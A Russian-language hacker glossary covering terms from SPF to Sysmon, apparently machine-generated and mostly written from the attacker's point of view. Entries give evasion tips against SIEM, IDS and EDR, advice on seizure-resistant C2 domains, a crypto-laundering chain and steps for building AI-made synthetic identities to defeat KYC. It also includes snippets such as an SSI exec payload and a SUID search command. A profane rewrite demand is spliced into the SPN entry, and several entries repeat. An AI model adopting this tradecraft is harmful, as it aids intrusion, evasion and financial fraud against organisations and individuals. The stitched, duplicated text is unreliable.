SPF (Sender Policy Framework) Стандарт аутентификации email, проверяющий, что письмо отправлено с сервера, разрешенного для домена (DNS TXT запись). SPF предотвращает подделку отправителя. Для атакующего SPF препятствие для фишинга с поддельного домена. Обход: использование скомпрометированных легитимных аккаунтов (которые проходят SPF), похожих доменов (typosquatting).

Spike SPIKE инструмент для фаззинга (fuzzing) сетевых протоколов. Используется для поиска уязвимостей (переполнение буфера, краши) в сетевых службах. Для атакующего SPIKE инструмент для разработки эксплойтов. Это ключевой термин в фаззинге.

Spike (Fuzzer) SPIKE инструмент для фаззинга (fuzzing) сетевых протоколов. Используется для поиска уязвимостей (переполнение буфера, краши) в сетевых службах. Для атакующего SPIKE инструмент для разработки эксплойтов.

Spiral В контексте атак "спираль" может означать: спиральная модель разработки ПО (software development lifecycle), спиральная атака (постепенное углубление в сеть), или визуализацию данных (спиральные графики в BloodHound). В целом, не является стандартным хакерским термином.

Splash Screen Заставка при запуске приложения. В контексте атак splash screen может использоваться для: сокрытия вредоносной активности (пока пользователь смотрит на заставку, малварь выполняется), социальной инженерии (поддельная заставка "обновления").

Splunk Платформа для анализа логов (SIEM). Splunk используется для сбора, индексации, поиска и корреляции логов. Splunk имеет язык поиска SPL (Search Processing Language). Для атакующего Splunk угроза: нужно не создавать событий, которые будут индексироваться, или чистить логи. Splunk может иметь уязвимости (RCE через поисковые запросы).

SPN Service Principal Name. и че это блять такое? где описание? SOLID В контексте атак не актуален. заебись что не актуален, где пояснение чо это? Software-Defined Perimeter (SDP) См. SDP. опять см, вообще пиздец. хуйня. переписывай всю букву с начала

SPN (Service Principal Name) Имя службы в Kerberos (Service Principal Name). SPN связывает службу (например, HTTP, MSSQL, CIFS) с учетной записью пользователя (service account). Формат: service_class/host:port. Kerberoasting атака, при которой атакующий запрашивает билет для SPN и извлекает хэш пароля service account для оффлайн-взлома. SPN регистрируются в Active Directory. Это ключевой термин в атаках на AD.

SPNEGO (Simple and Protected GSSAPI Negotiation) Механизм аутентификации Windows (SPNEGO), используемый в HTTP-аутентификации (IIS, SharePoint). SPNEGO автоматически выбирает между Kerberos и NTLM. Атаки: NTLM relay через SPNEGO, downgrade.

Spoofing Подмена (IP, DNS, email, MAC, ARP). Используется для MITM (man-in-the-middle), фишинга, обхода фильтров, DoS (amplification). Spoofing требует понимания протоколов.

Spoofing (Email) Подмена email-адреса отправителя. Используется в фишинге (письмо выглядит как от легитимной компании). Защита: SPF, DKIM, DMARC.

Spoofing (IP) Подмена IP-адреса отправителя. Используется в DDoS-амплификации (отраженные атаки), обходе IP-фильтров. Для TCP-соединений IP spoofing затруднен из-за handshake.

Spoofing (MAC) Подмена MAC-адреса. Используется для обхода NAC (Network Access Control), отслеживания, эмуляции устройств.

Spring (Java) Фреймворк для Java (Spring Framework). Уязвимости Spring: Spring4Shell (CVE-2022-22965), CVE-2016-1000027 (remote code execution). Используется в корпоративных приложениях.

Spring4Shell RCE уязвимость в Spring Framework (CVE-2022-22965), позволяющая выполнить произвольный код через параметры запроса. В 2026 все еще актуальна для непропатченных систем.

SPX Sequenced Packet Exchange (SPX) транспортный протокол в сетях Novell NetWare (устаревший), аналог TCP. В контексте атак SPX может встречаться в legacy-системах (старые промышленные сети). Не является ключевым термином.

SQL (Structured Query Language) Язык запросов к реляционным базам данных. SQL injection (SQLi) внедрение SQL-кода в параметры запроса. Типы SQLi: error-based, union-based, blind (time-based, boolean-based), out-of-band. SQLi позволяет красть данные, модифицировать, выполнять команды (xp_cmdshell). В 2026 SQLi встречается в старых приложениях, API, где нет параметризации.

SQL Injection (SQLi) Внедрение SQL-кода в параметры запроса (SQL Injection). Типы: error-based (ошибки базы данных), union-based (объединение результатов), blind (time-based, boolean-based), out-of-band (внеполосный). SQLi позволяет красть данные, модифицировать, выполнять команды (xp_cmdshell). В 2026 SQLi встречается в старых приложениях, API.

SQL Server Microsoft SQL Server. Уязвимости SQL Server: xp_cmdshell (выполнение команд), слабые пароли (sa/пустой), misconfig (порт 1433 открыт в интернет), линкованные серверы (lateral movement). SQL Server часто используется в корпоративных сетях.

SQLMap Инструмент для автоматизации SQL injection. SQLMap определяет уязвимые параметры, извлекает данные (базы, таблицы, записи), выполняет команды (если есть xp_cmdshell). Используется атакующими для эксплуатации SQLi.

SQS (Simple Queue Service) AWS Simple Queue Service сервис очередей сообщений. SQS используется для: C2 (очередь сообщений между агентами), эксфильтрации (отправка данных через очередь). SQS-очереди могут быть использованы для скрытой коммуникации (трафик выглядит как легитимный AWS API).

SRC (Source) Исходный код.

SRP (Secure Remote Password) Протокол аутентификации, не передающий пароль по сети. SRP используется в некоторых VPN, Wi-Fi (WPA3). Атаки на SRP: оффлайн-подбор пароля (если перехвачена сессия).

SRTP (Secure Real-time Transport Protocol) Шифрование VoIP (RTP). SRTP шифрует голосовые и видео пакеты. Атаки на SRTP: downgrade (принуждение к незашифрованному RTP), взлом ключей (если слабые).

SSD (Solid State Drive) Твердотельный накопитель. SSD имеет команду ATA Secure Erase для быстрого уничтожения данных (все ячейки помечаются как стертые). Восстановление данных с SSD сложнее, чем с HDD, из-за wear leveling и TRIM. Для атакующего SSD цель: уничтожение данных через Secure Erase, или, наоборот, извлечение данных из SSD (через чип-офф).

SSDP (Simple Service Discovery Protocol) Протокол для UPnP (Universal Plug and Play). SSDP используется в DDoS-амплификации (SSDP amplification): отправка запроса на SSDP-сервер с поддельным IP жертвы, сервер отвечает большим ответом. Также используется для обнаружения IoT-устройств в сети.

SSH (Secure Shell) Протокол для удаленного управления (Secure Shell, порт 22) с шифрованием и аутентификацией. SSH используется для: администрирования серверов, туннелирования (port forwarding), передачи файлов (SFTP), C2 (SSH-туннели). Аутентификация может быть по паролю или по SSH-ключам. Атаки на SSH: брутфорс паролей, кража SSH-ключей (приватных), уязвимости в реализации (CVE-2024-6387), man-in-the-middle (если нет проверки ключа хоста).

SSH Agent Агент SSH, хранящий приватные ключи в памяти и предоставляющий их для аутентификации. Компрометация SSH agent (через доступ к сокету, процессу) позволяет использовать ключи для доступа к другим системам. SSH agent forwarding может быть использован для lateral movement.

SSH Key Ключ SSH (приватный и публичный). Приватный ключ секрет, позволяющий аутентифицироваться без пароля. Кража приватного ключа (из файла ~/.ssh/, из памяти, из agent) дает доступ к системам, где установлен публичный ключ. SSH-ключи часто не защищены паролем (passphrase).

SSH Tunneling Туннелирование через SSH (port forwarding). Типы: local forwarding (порт на клиенте удаленный сервер), remote forwarding (порт на сервере клиент), dynamic forwarding (SOCKS прокси). Используется для: обхода firewalls, доступа к внутренним сетям, сокрытия C2.

SSI (Server Side Includes) Технология веб-серверов (Apache) для включения содержимого файлов в HTML. SSI injection уязвимость, позволяющая выполнить команды на сервере через директивы (например, <!--#exec cmd="id" -->). В 2026 SSI встречается в legacy-приложениях.

SSL (Secure Sockets Layer) Устаревший протокол шифрования (предшественник TLS). SSL v2 и v3 уязвимы (POODLE, DROWN). В 2026 TLS является стандартом, SSL отключен.

SSL Certificate Сертификат TLS/SSL (X.509). Используется для: шифрования трафика, аутентификации сервера. Кража приватного ключа сертификата позволяет расшифровывать трафик (если нет PFS Perfect Forward Secrecy) и выдавать себя за сервер.

SSL Pinning Certificate pinning: привязка сертификата или публичного ключа в приложении. Приложение проверяет, что сертификат сервера совпадает с закрепленным, игнорируя доверенные корневые центры. SSL pinning защищает от MITM (man-in-the-middle). Для атакующего SSL pinning препятствие: нужно модифицировать приложение (отключить pinning) или скомпрометировать приватный ключ сервера.

SSL Strip Атака, понижающая TLS до HTTP (SSL stripping). Атакующий (MITM) перенаправляет запросы на HTTP, заменяя ссылки на HTTPS. HSTS (HTTP Strict Transport Security) защищает от SSL strip: браузер автоматически использует HTTPS.

SSO (Single Sign-On) Единый вход (Single Sign-On): пользователь входит один раз в Identity Provider (IdP) и получает доступ ко всем подключенным приложениям. SSO использует SAML, OAuth, OpenID Connect. Компрометация IdP (Okta, Azure AD) дает доступ ко всем приложениям организации. The Com атакует Okta и Azure AD (SSO провайдеры).

SSP (Security Support Provider) Провайдер безопасности Windows (Security Support Provider). SSP используются для аутентификации (Kerberos, NTLM, Negotiate). SSP injection техника установки вредоносного SSP для кражи паролей (все пароли, проходящие через SSP, могут быть залогированы). Используется для persistence.

SSRF (Server-Side Request Forgery) Уязвимость, позволяющая атакующему заставить сервер отправлять HTTP-запросы от своего имени (Server-Side Request Forgery). SSRF используется для: обхода firewalls (доступ к внутренним сервисам), чтения файлов (file://), доступа к метаданным облака (http://169.254.169.254/latest/meta-data/), порт-сканирования внутренней сети, эксплуатации внутренних сервисов (например, Redis, Memcached).

SSSD (System Security Services Daemon) Демон для аутентификации в Linux (AD, LDAP, Kerberos). SSSD кэширует учетные данные. Уязвимости SSSD могут привести к повышению привилегий.

ST (Security Token) Токен безопасности.

Stage (Payload) Стейдж-пейлоад: первая стадия payload, которая загружает основной payload (stage). Используется для уменьшения размера initial payload и обхода детектов. Пример: stager скачивает и выполняет meterpreter.

Stager Загрузчик (stager): маленький payload, который скачивает и выполняет основной payload. Stager может быть реализован как PowerShell скрипт, shellcode. Используется для обхода ограничений на размер payload.

Staging Server Промежуточный сервер для хранения инструментов, данных, результатов перед эксфильтрацией. Staging server может быть скомпрометированным легитимным сервером или VPS. Interlock использовал staging server, который был misconfigured, что позволило AWS обнаружить их инфраструктуру.

Standalone (Malware) Малварь, не требующая C2 (автономная). Wiper (например, Handala) может быть standalone: выполняется, уничтожает данные, завершается. В отличие от ransomware, который требует C2 для получения ключа.

Standard (Security) Стандарт безопасности (ISO 27001, NIST SP 800-53, PCI DSS, HIPAA). Соответствие стандартам может означать зрелые процессы безопасности.

Startup (Linux) Механизмы автозагрузки в Linux: systemd (службы), init.d, rc.local, crontab (@reboot), .bashrc, .profile. Используются для persistence.

Startup (Windows) Папка автозагрузки: %AppData%\Microsoft\Windows\Start Menu\Programs\Startup (пользователь) и %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup (все пользователи). Используется для persistence: поместить малварь в папку Startup, она запустится при логине пользователя.

State Actor Государственный актор (APT Advanced Persistent Threat). Государственные хакеры действуют в интересах национальной безопасности: шпионаж, разрушение, влияние. Имеют ресурсы, долгосрочные цели, могут использовать 0-day. Примеры: Lazarus (DPRK), APT28 (Russia), APT34 (Iran), Handala (MOIS Министерство разведки Ирана).

Static Analysis Статический анализ: анализ кода без выполнения. Используется для поиска уязвимостей, анализа малвари (reverse engineering). Для обхода атакующие используют обфускацию, упаковку (packing), полиморфизм.

Station (Base) Базовая станция (Wi-Fi, сотовой связи). Поддельная базовая станция (IMSI catcher) используется для перехвата трафика, определения местоположения.

STD (Standard) Стандарт.

Steal (Data) Кража данных.

Stealc Инфостилер, конкурент RedLine и LummaC2. Stealc крадет пароли из браузеров, cookies, крипто-кошельки, файлы, делает скриншоты, кейлог. Распространяется через malvertising, crack-сайты, фишинг. Имеет панель управления (C2).

Stealth Скрытность (stealth techniques). Stealth включает: минимальное использование ресурсов, маскировку трафика (под легитимный), имитацию легитимных процессов, очистку логов, память-только выполнение (memory-only). Stealth основа долгосрочного присутствия.

Steganography Стеганография: сокрытие данных в других файлах (изображения, аудио, видео). Используется для: сокрытия малвари (в изображениях на сайте), C2 (данные в изображениях), эксфильтрации (данные в изображениях, загружаемых на фотохостинги).

STEM (Science, Technology, Engineering, Mathematics) Наука, технология, инженерия, математика образовательные дисциплины. В контексте атак STEM не является термином.

Sticky Key Атака "липкие клавиши": замена файла sethc.exe (липкие клавиши) на cmd.exe на экране входа в Windows (нажатие Shift 5 раз запускает cmd). Используется для получения SYSTEM на экране входа (LPE). Требует физического доступа или возможности записи в System32.

STIG (Security Technical Implementation Guide) Руководство по настройке безопасности (DISA STIG). STIG содержит требования к конфигурации (Windows, Linux, сетевые устройства). Организации, следующие STIG, имеют более жесткую конфигурацию, что усложняет атаки.

Stingray IMSI catcher (поддельная базовая станция). Stingray перехватывает IMSI, может перехватывать SMS, звонки. Используется law enforcement и злоумышленниками. Для обхода используется шифрование (TLS), избегание использования SMS для MFA.

Stitching Техника в криптографии и реверс-инжиниринге, связанная с комбинированием фрагментов данных или кода для восстановления целостной структуры. В контексте анализа малвари stitching может означать сборку разрозненных фрагментов shellcode или восстановление оригинального кода из упакованного бинарника. В криптоанализе stitching используется для соединения частей ключа или данных, полученных из разных источников (например, из side-channel атак). В контексте хакерского словаря термин встречается реже, но может использоваться при описании процессов восстановления эксплойтов из дампов памяти или при работе с упакованными образцами. В современных атаках 2026 года stitching как отдельная техника не выделяется, но принцип комбинирования разрозненных данных (например, обогащение украденных PII из разных утечек для создания synthetic identity) является важной частью post-exploitation.

Stored XSS Тип XSS (Cross-Site Scripting), при котором вредоносный JavaScript-код сохраняется (хранится) в базе данных приложения (например, в поле комментария, профиля пользователя, заказа) и выполняется каждый раз, когда страница с этим содержимым загружается другим пользователем. В отличие от reflected XSS, где скрипт передается в параметрах URL, stored XSS не требует, чтобы жертва перешла по специальной ссылке достаточно просто открыть страницу. Stored XSS особенно опасен в админ-панелях, блогах, форумах, системах тикетов. Для атакующего stored XSS способ получить сессию администратора, украсть cookies, выполнить действия от имени других пользователей, распространить малварь. В 2026 stored XSS остается актуальным для веб-приложений с недостаточной валидацией ввода.

Strace Утилита командной строки в Linux, трассирующая системные вызовы (syscalls), которые выполняет программа. strace ./program показывает все вызовы к ядру: открытие файлов, чтение/запись, создание процессов, сетевые соединения. Используется для: анализа поведения малвари (без запуска в sandbox), поиска уязвимостей (понимание, какие файлы открывает программа), отладки. Для атакующего strace инструмент для изучения целевого ПО, выявления слабых мест (например, чтение конфигурационных файлов с паролями), понимания, как программа взаимодействует с системой.

Stream (C2) Поток данных между агентом (зараженным устройством) и C2-сервером (Command and Control). Stream может быть реализован через различные протоколы: TCP (устойчивое соединение), UDP (без установки соединения), HTTP/HTTPS (поверх TCP, маскируется под веб-трафик), WebSocket (двунаправленный, постоянный), DNS (запросы-ответы). В контексте C2 stream характеризуется направлением (agent C2 отправляет heartbeat и результаты, C2 agent отправляет команды), частотой (cadence), шифрованием, обфускацией. Stream должен быть скрытым, чтобы не привлекать внимание сетевых детектов.

Stream (TCP) TCP-поток: установленное TCP-соединение между двумя узлами, обеспечивающее надежную, упорядоченную доставку данных. В отличие от UDP, TCP требует установления соединения (three-way handshake) и поддерживает состояние. Для C2 TCP-стримы используются реже, чем HTTP/HTTPS, потому что они более заметны (постоянное соединение, нехарактерное для обычного пользовательского трафика). Однако TCP может быть использован в закрытых сетях (например, между серверами внутри дата-центра) или для reverse shell (nc, socat).

Strike (Cobalt) Cobalt Strike коммерческий C2-фреймворк для эмуляции атак. В контексте "strike" может относиться к атаке, проводимой с использованием Cobalt Strike, или к самому Beacon (агенту). Cobalt Strike Strike не отдельный термин, а часть названия.

String (Obfuscation) Обфускация строк: техника сокрытия строковых констант в коде, чтобы затруднить статический анализ. Методы: шифрование (XOR с ключом, AES), кодирование (Base64), разбивка на фрагменты, сборка во время выполнения. Строки могут содержать URL C2, имена функций, пароли. Без обфускации строки видны в бинарнике (команда strings). Для атакующего обфускация строк стандартная практика, чтобы антивирусы и исследователи не могли быстро извлечь IoC.

Strip (SSL) SSL strip (SSL stripping) атака, понижающая защищенное соединение HTTPS до незащищенного HTTP. Атакующий (MITM) перехватывает трафик, заменяет ссылки на HTTPS ссылками на HTTP, и жертва общается с сервером по HTTP, думая, что по HTTPS. Пароли и данные передаются в открытом виде. Защита: HSTS (HTTP Strict Transport Security), которая заставляет браузер использовать HTTPS даже если пользователь ввел HTTP.

Strobe (Scan) Стробоскопическое сканирование (strobe scan) метод сканирования сети, при котором сканируется один порт на множестве IP-адресов (в отличие от обычного сканирования, где сканируются многие порты на одном IP). Используется для поиска конкретного сервиса (например, веб-сервера на порту 443) в большом диапазоне IP. Strobe scan быстрее и менее заметен, чем полное сканирование каждого IP.

Structure (PE) Структура PE (Portable Executable) формат исполняемых файлов в Windows (.exe, .dll, .sys). PE состоит из: DOS header (MZ), NT headers (Signature, File Header, Optional Header), section headers, sections (.text код, .data данные, .rdata read-only данные, .rsrc ресурсы). Понимание структуры PE необходимо для reverse engineering, упаковки (packing), инъекции кода, модификации исполняемых файлов. Атакующие модифицируют PE, чтобы изменить точку входа, добавить секции, обфусцировать импорты.

Structured Exception Handling (SEH) Механизм обработки исключений в Windows, позволяющий программе реагировать на ошибки (деление на ноль, доступ к неверной памяти). SEH хранит адреса обработчиков в стеке. В эксплойтах используется SEH overwrite перезапись адреса обработчика исключения для получения контроля потока выполнения. Защита: SEHOP (Structured Exception Handling Overwrite Protection) проверяет цепочку обработчиков.

Stub (Payload) Заглушка (stub) часть упаковщика (packer), которая выполняется первой, распаковывает и запускает оригинальный код малвари. Stub может содержать анти-отладку, анти-сэндбокс, расшифровку. После выполнения stub передает управление на оригинальную точку входа (OEP Original Entry Point). Упаковка с stub используется для обхода сигнатурных детектов.

Stuxnet Промышленный червь (2010), атаковавший иранские ядерные центрифуги. Stuxnet использовал четыре zero-day уязвимости (включая уязвимости в Windows и Siemens Step7), подписанные драйверы (украденные сертификаты Realtek и JMicron), модифицировал PLC (Programmable Logic Controller) через уязвимости в ПО Siemens. Stuxnet первый известный кибер-физический weapon, продемонстрировавший возможность удаленного физического разрушения оборудования. Для атакующего Stuxnet пример сложной APT-операции с использованием supply chain, нескольких 0-day, и targeting промышленных систем.

SU (Switch User) Команда Linux для смены пользователя в текущей сессии. su username переключает на указанного пользователя (требует его пароль). su - (или su - root) переключает на root с загрузкой окружения root (home, переменные). Используется для повышения привилегий, если известен пароль root. В отличие от sudo, su требует пароль целевого пользователя, а не текущего.

SUBD (Subdomain) Поддомен: часть домена, стоящая перед основным доменом (например, admin.example.com). Поддомены часто используются для различных сервисов: mail.example.com, vpn.example.com, test.example.com. Для атакующего subdomain enumeration важная часть OSINT: поиск поддоменов может раскрыть неочевидные цели (админ-панели, старые версии сайтов, скрытые сервисы). Методы: DNS-запросы (dig), поиск в crt.sh (сертификаты), Google dorks, brute force.

Subdomain Enumeration Перечисление поддоменов: процесс поиска всех поддоменов целевого домена. Методы: пассивные (поиск в crt.sh, DNSDB, SecurityTrails, Google, Wayback Machine) и активные (DNS-брутфорс со словарем, zone transfer). Subdomain enumeration используется для расширения поверхности атаки: найденные поддомены могут быть уязвимы (не обновлялись, забыты, имеют misconfig). ShinyHunters использует subdomain enumeration для поиска Salesforce Experience Cloud сайтов.

Subdomain Takeover Захват поддомена: ситуация, когда DNS-запись (обычно CNAME) указывает на ресурс (S3 бакет, Azure Storage, Heroku, Github Pages, Shopify), который больше не существует. Атакующий создает ресурс с тем же именем и получает контроль над поддоменом. Используется для: размещения фишинговых сайтов на легитимном домене (обход фильтров), C2 (доверие к домену), кражи cookies (SameSite политика). Для обнаружения subdomain takeover используются сканеры (nuclei, subjack).

Subnet Подсеть (subnetwork): логическое разделение IP-сети на более мелкие сегменты. Определяется маской подсети (например, 192.168.1.0/24). Понимание подсетей важно для network mapping после initial access: определение границ сети, поиск маршрутизаторов, планирование lateral movement.

Substitution Cipher Шифр подстановки: метод шифрования, при котором каждый символ заменяется на другой символ (или набор символов) по фиксированному правилу (шифр Цезаря, XOR с ключом). В малвари substitution cipher используется для обфускации строк (например, XOR с 0x42). Слабая защита, легко дешифруется при наличии образца.

SUDO (Superuser Do) Команда Linux для выполнения команд от имени другого пользователя (обычно root) с правами текущего пользователя. sudo command выполняет команду с привилегиями root (или указанного пользователя). Sudo настраивается через файл /etc/sudoers. Misconfig в sudoers (например, user ALL=(ALL) NOPASSWD: ALL) позволяет пользователю выполнять любые команды от root без пароля, что дает полный контроль над системой. Используется для LPE.

Sudoers Файл конфигурации sudo (/etc/sudoers), определяющий, какие пользователи и группы могут выполнять какие команды от root. Редактируется только командой visudo. Пример строки: username ALL=(ALL) ALL пользователь может выполнять любые команды от любого пользователя, требуется пароль. username ALL=(ALL) NOPASSWD: ALL без пароля (опасно). Sudoers misconfig распространенная уязвимость для повышения привилегий.

Suffix (Domain) Суффикс домена (TLD Top-Level Domain): .com, .org, .net, .ru, .to, .onion. Выбор TLD для регистрации доменов C2 важен для OPSEC: некоторые TLD (.ru, .to, .su) менее доступны для US seizure; .onion обеспечивает анонимность через Tor. Handala использовала .to (Тонга) для доменов, что затруднило seizure.

SUID (Set User ID) Бит в Unix/Linux, позволяющий запускать программу с правами владельца файла (Set User ID). SUID-бинарники цель для LPE (если есть уязвимость). Примеры: passwd, sudo, pkexec. Для поиска SUID-бинарников: find / -perm -4000 2>/dev/null.

Sulley Фреймворк для фаззинга (fuzzing) сетевых протоколов. Sulley позволяет создавать мутировавшие пакеты для поиска уязвимостей в сетевых службах. Используется исследователями безопасности для обнаружения 0-day. Для атакующего Sulley инструмент для разработки эксплойтов.

SunBurst Backdoor, внедренный в обновления SolarWinds Orion в 2020 году (supply chain attack). SunBurst был подписан легитимным сертификатом SolarWinds, работал в памяти, загружал дополнительные модули с C2. SunBurst скомпрометировал тысячи организаций, включая правительственные агентства США. В 2026 SunBurst символ опасности supply chain атак.

Superfish Adware, предустановленный на ноутбуки Lenovo в 2015 году. Superfish внедрял самоподписанный корневой сертификат, который использовался для инъекции рекламы. Сертификат позволял осуществлять MITM-атаки на HTTPS-соединения, что создавало критическую уязвимость. Пример supply chain атаки на уровне прошивки/предустановленного ПО.

Supernode (P2P) Суперузел в P2P-сетях (peer-to-peer) узел, координирующий работу других узлов, хранящий метаинформацию. В P2P ботнетах (например, Storm, Zeus P2P) суперузлы управляют сетью, передают команды, собирают результаты. Атака на суперузлы может разрушить ботнет. Для атакующего создание P2P ботнета со множеством суперузлов повышает устойчивость к takedown.

Supply Chain Attack Атака на цепочку поставок: компрометация не самой цели, а ее поставщика, разработчика, обновлений, зависимостей. Цель внедрить вредоносный код в продукт, который затем попадет к тысячам клиентов. Примеры: SolarWinds (обновления Orion), Bybit (Safe{Wallet} третья сторона), Conduent (подрядчик), ShinyHunters (Salesforce SaaS misconfig дает доступ к данным сотен клиентов). В 2026 supply chain attacks один из основных векторов для государственных акторов и крупных криминальных групп.

Suricata IDS/IPS (Intrusion Detection/Prevention System) с открытым кодом. Suricata анализирует сетевой трафик по сигнатурам (схож с Snort), поддерживает многопоточность, GPU-ускорение. Используется для обнаружения атак, включая C2-трафик. Для атакующего Suricata угроза: нужно шифровать трафик (TLS), обфусцировать протоколы, имитировать легитимный трафик.

Surveillance Слежка: сбор информации о целях с использованием технических средств (IP-камеры, микрофоны, перехват трафика, взлом устройств). В кибервойне surveillance этап разведки. MuddyWater использовал surveillance через взлом IP-камер для наведения ракет (battle damage assessment). Handala использовала surveillance для сбора данных о жертвах (doxxing).

Suspicious (Activity) Подозрительная активность: действия, которые отличаются от нормального поведения пользователя или системы. Примеры: запуск PowerShell из Word, массовое копирование файлов в ночное время, создание пользователя, остановка антивируса. Атакующий должен избегать подозрительных паттернов или имитировать легитимную активность (behavioral blending).

SVC (Service) Служба Windows (Windows Service). Службы могут быть настроены на автоматический запуск и работать с повышенными привилегиями (SYSTEM). Используются для persistence и lateral movement.

SVID (Service Identifier) Идентификатор службы в системах управления сервисами (например, в Kubernetes). В контексте атак SVID может быть целью для атак на service mesh (Istio, SPIFFE). Однако это узкоспециализированный термин.

SVM (Support Vector Machine) Алгоритм машинного обучения, используемый в некоторых EDR (Endpoint Detection and Response) для классификации: отличать вредоносные файлы от легитимных. SVM строит гиперплоскость, разделяющую образцы. Для атакующего понимание SVM помогает разрабатывать adversarial examples: модифицировать малварь так, чтобы она была классифицирована как легитимная.

SVN (Apache Subversion) Система контроля версий (предшественник Git). SVN репозитории могут содержать конфигурационные файлы с паролями, ключами. Уязвимости SVN могут привести к RCE. В 2026 SVN используется в legacy-проектах; атакующие ищут доступ к SVN-репозиториям (через WebDAV, misconfig) для кражи исходного кода.

SW (Switch) Сетевой коммутатор (switch). Атаки на коммутаторы: MAC flooding (переполнение таблицы MAC-адресов, заставляющее коммутатор работать как hub), VLAN hopping (переход между VLAN), STP manipulation (манипуляция Spanning Tree Protocol для перенаправления трафика), ARP poisoning (в сетях без защиты). Компрометация коммутатора может дать атакующему доступ к трафику всей сети.

Swap (Crypto) Обмен криптовалют на децентрализованной бирже (DEX swap). Используется для отмывания средств: украденные Bitcoin через миксер (Sinbad) обмен на Monero (THORChain) обмен на USDC (Uniswap) вывод через deepfake KYC. Swap на DEX не требует KYC, что делает его привлекательным для laundering.

Swap (Memory) Файл подкачки (swap file) в Windows (pagefile.sys) и Linux (swap partition, swap file). Когда оперативной памяти недостаточно, данные выгружаются на диск. Swap может содержать пароли, ключи, содержимое процессов, выгруженные из RAM. Для атакующего swap источник данных (если есть доступ к файловой системе). Для защиты используется шифрование swap (dm-crypt, BitLocker).

Swarm (Botnet) Рой (swarm) сеть зараженных устройств (ботнет). Термин используется для описания распределенных ботнетов с peer-to-peer архитектурой.

Swift (Apple) Язык программирования Apple для iOS, macOS, watchOS, tvOS. Swift современная альтернатива Objective-C. Малварь для macOS может быть написана на Swift. Swift сложнее для реверс-инжиниринга, чем Objective-C, из-за сложного рантайма и отсутствия стандартных инструментов декомпиляции.

Swift (SWIFT) Сообщество всемирных межбанковских финансовых каналов (SWIFT). SWIFT-атаки (Bangladesh Bank 2016, $81M) компрометация SWIFT-терминалов для отправки несанкционированных переводов. Lazarus Group (DPRK) проводила SWIFT-атаки. Для атакующего SWIFT цель для финансовых преступлений.

SWT (Standard Widget Toolkit) Графическая библиотека для Java (SWT). Используется в Eclipse и других Java-приложениях. В контексте атак SWT может быть целью для exploitation (уязвимости в GUI-библиотеках). Однако не ключевой термин.

SX (Send) Сокращение для "send" (отправка). В контексте атак может встречаться в названиях функций (send(), WSASend), но не является самостоятельным термином.

SYN (Synchronize) TCP-флаг SYN, используемый для установки соединения (первый шаг three-way handshake). SYN flood DoS-атака, отправляющая множество SYN-пакетов без завершения handshake.

SYN Flood DoS-атака, исчерпывающая таблицу полуоткрытых соединений (backlog) на целевом сервере. Атакующий отправляет SYN-пакеты с поддельным IP-адресом источника; сервер отвечает SYN-ACK и ждет ACK, который никогда не приходит. Полуоткрытые соединения накапливаются, пока не достигнут лимита, после чего сервер не может принимать новые соединения.

SYN Scan Тип сканирования портов (TCP SYN scan, half-open scan). Атакующий отправляет SYN-пакет на порт; если приходит SYN-ACK порт открыт, если RST закрыт, если нет ответа фильтруется. SYN scan не завершает TCP handshake, поэтому не оставляет записей в логах некоторых сервисов (но может быть обнаружен IDS). Быстрый и менее заметный, чем полное соединение (connect scan).

SYN-ACK TCP-пакет с флагами SYN и ACK, отправляемый сервером в ответ на SYN (второй шаг three-way handshake). SYN-ACK используется в SYN scan для определения открытых портов.

Sync (File) Синхронизация файлов (rsync, robocopy). Используется для эксфильтрации: копирование украденных данных на удаленный сервер через rsync (SSH) или robocopy (SMB). Синхронизация может быть настроена на low & slow, чтобы не вызывать подозрений.

Sync (Time) Синхронизация времени с NTP-сервером. Нарушение синхронизации может привести к проблемам: Kerberos (билеты имеют временные метки, разница >5 минут приводит к ошибкам), сертификаты (validity period), логи (смещение времени затрудняет расследование). Атакующий может нарушить синхронизацию (через атаку на NTP) для нарушения работы систем.

Synchronization Синхронизация процессов/данных. В атаках может быть нарушена для сбоя работы систем.

Synchronized (Time) Синхронизированное время.

Syndicate Синдикат: организованная группа киберпреступников с четким разделением ролей: разработчики (создают малварь, C2), аффилиаты (проводят атаки), брокеры доступа (IAB), переговорщики (общаются с жертвами), лаундеристы (отмывают деньги). Примеры: The Com, ShinyHunters, Scattered Spider. Syndicate management compartmentalization (участники знают только свой сегмент), burner identities (одноразовые личности), zero-knowledge ops (никто не знает полной картины).

Synthetic Identity Синтетическая личность: комбинация реальных (украденных) и сгенерированных AI данных для создания нового "человека", которого не существует. Пример: SSN и дата рождения из утечки Conduent + сгенерированное AI лицо (StyleGAN) + поддельные документы (паспорт, водительские права) + поддельная кредитная история. Используется для: открытия счетов в банках (для отмывания денег), получения кредитов, обхода KYC (Know Your Customer). Deepfake KYC процесс создания synthetic identity.

Syscall (System Call) Системный вызов способ, которым пользовательские приложения запрашивают услуги ядра операционной системы (открытие файлов, создание процессов, сетевые соединения). В Windows системные вызовы проходят через ntdll.dll. EDR ставят хуки на ntdll.dll для мониторинга. Direct syscalls техника обхода хуков: вызов системных вызовов напрямую, минуя ntdll.dll (через ассемблерные инструкции syscall в x64, sysenter в x86). Используется в memory-only payloads.

Sysinternals Набор утилит Microsoft для администрирования и диагностики Windows. Включает: Process Explorer (управление процессами), Process Monitor (мониторинг файловой системы, реестра), PsExec (удаленное выполнение команд), Autoruns (автозагрузка), ProcDump (дамп процессов). Утилиты легитимны, подписаны Microsoft. Атакующие используют Sysinternals для: дампа LSASS (ProcDump), lateral movement (PsExec), энумерации (Autoruns), сокрытия (Process Explorer может быть использован для kill процессов EDR).

Syslog Стандарт логирования в Unix/Linux (и поддерживается многими сетевыми устройствами). Syslog сообщения имеют уровень (emerg, alert, crit, err, warning, notice, info, debug) и facility (auth, cron, daemon, kern, local0-7). Syslog отправляется на центральный сервер для агрегации (SIEM). Для атакующего syslog угроза: нужно чистить локальные логи или предотвращать отправку (через изменение конфигурации rsyslog, syslog-ng).

Sysmon (System Monitor) Утилита Sysinternals для детального логирования событий Windows: запуск процессов, сетевые соединения, изменения реестра, загрузка драйверов, создание файлов. Sysmon используется защитниками для углубленного мониторинга (логи отправляются в SIEM). Для атакующего Sysmon серьезная угроза: он логирует действия, которые могут быть незаметны для стандартного Event Log. Обход: отключение службы Sysmon (требует прав), изменение конфигурации, использование техник, которые не триггерят события (memory-only, direct syscalls).

